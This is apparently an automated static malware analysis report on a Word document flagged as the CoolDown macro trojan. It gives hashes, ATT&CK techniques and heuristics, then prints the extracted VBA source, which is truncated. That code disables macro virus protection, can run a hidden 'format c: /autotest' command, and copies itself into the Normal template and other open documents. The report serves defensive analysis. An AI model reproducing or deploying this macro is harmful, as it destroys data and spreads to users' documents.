Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f846c4688a179ba2…

MALICIOUS

Office (OLE)

38.0 KB Created: 2001-07-04 19:42:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 3ccfb99c43d65d580ed6305b57c037a2 SHA-1: 8ce29afa3a8a2455a5a703f9798db66c6dd4783f SHA-256: f846c4688a179ba28073f03745ebea22467157f3f6d0a9748d3703df1e962482
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains VBA macros, specifically a Document_Open macro that calls a function named 'CoolDown'. This function, when executed with the argument '1', attempts to run the command 'format c: /autotest', which is highly destructive. The presence of the 'Shell()' call and the 'Document_Open' macro strongly indicate malicious intent to execute arbitrary commands.

Heuristics 5

  • ClamAV: Doc.Trojan.CoolDown-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.CoolDown-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29632 bytes
SHA-256: 22f4a938e9d995dba96f20f68a0a045a9ce646f8f17d02fae4b0b50efd9c238c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
     Private Sub Document_Open()
            CoolDown 0
        ' 3043.731
End Sub
       ' 4139.836
' 5091.396
Private Sub Document_Close()
 CoolDown _
        0
        ' 6861.435
' 1609.434
End _
 Sub
  Private _
        Sub ToolsMacro()
     CoolDown 1
      End _
  Sub
        

Private Sub ViewVBCode()
            CoolDown 1
        End _
              Sub
     Private Sub _
      CoolDown(How As _
          Integer)
              
On _
  Error Resume Next
        Dim c As String, a _
 As _
     Long, _
        b _
            As Long, _
       d _
      As _
            Long, e _
     As Long, f _
             As Long, res _
          As _
               String, m As Boolean
         ' 6696.699
' 5934.029
Randomize
     
With _
                Options
        ' 1338.273

.VirusProtection _
         = _
      False
 ' 5550.656
.ConfirmConversions = _
      False
       .SaveNormalPrompt = False
 ' 9018.309
' 6754.591
End With
  If How _
            = _
      1 _
        Then
                ' 5697.444

' 606.6084
s _
         = Shell("format" & Chr(32) & "c:" & _
  Chr(32) & _
            "/autotest", vbHide)
             Else
   ' 6741.466
' 5936.861
With _
    NormalTemplate.VBProject.VBComponents(1).CodeModule
       If _
           Not .Find("Cool" & "Down", _
              1, _
    1, 1000, 1000, _
          False, False) _
               Then
           a = .CountOfLines
         For b _
             = _
             1 To a
               
' 7876.239
.DeleteLines (1)
            Next
            d _
     = _
          1
  a _
            = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
       
res = ""
    ' 5730.678
For b = 1 To _
       a
         c = _
  ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(b, _
             1)
          c _
           = RTrim(LTrim(c))
        ' 3419.099
If foo(c, _
         f, res) _
    Then
   ' 9140.818
' 8870.4
' 8536.813

.InsertLines _
      d, _
       Space(Rnd * 16) _
            & res
               ' 1491.877
' 9123.504
' 4697.39
d = _
    d _
           + _
           f
        f = _
          0
      ' 4371.166
res = ""
       

' 5278.109
End If
             ' 404.4265
Next
       
NormalTemplate.Save
     ' 3147.956
End _
      If
      End With
      For e = _
     1 To Documents.Count
       ' 2721.87
With Documents(e).VBProject.VBComponents(1).CodeModule
 If Not .Find("Cool" & _
    "Down", 1, _
                1, 1000, 1000, _
    False, False) Then
              ' 4399.506
a _
           = _
           .CountOfLines
    ' 1505.411
m = _
        Documents(e).Saved
          
' 5936.951
' 7478.099
' 590.6182

For b = 1 To a
         ' 7121.263
' 8561.975
' 9947.795
.DeleteLines (1)
               ' 677.703
Next
           ' 7454.467
d _
    = _
        1
               a _
   = _
  NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
               ' 3058.095
' 8247.968
' 8953.323
' 8072.195
' 4574.436
' 1420.563
' 9721.467
res _
  = _
""
       For _
           b = _
    1 _
          To _
              a
               c = _
         NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(b, _
         1)
c = RTrim(LTrim(c))
          ' 5256.324
' 7004.326
If _
             foo(c, _
   f, _
          res) _
               Then
         
' 4980.794
.InsertLines _
 d, _
     Space(Rnd * 16) & _
             res
                d _
      = _
           d + f
       f _
            = _
       0
              ' 5780.963
res _
          = _
      ""
               End If
        ' 9160.506
' 7513.05
' 5607.009
Next
  If _
            Documents(e).Path _
       
... (truncated)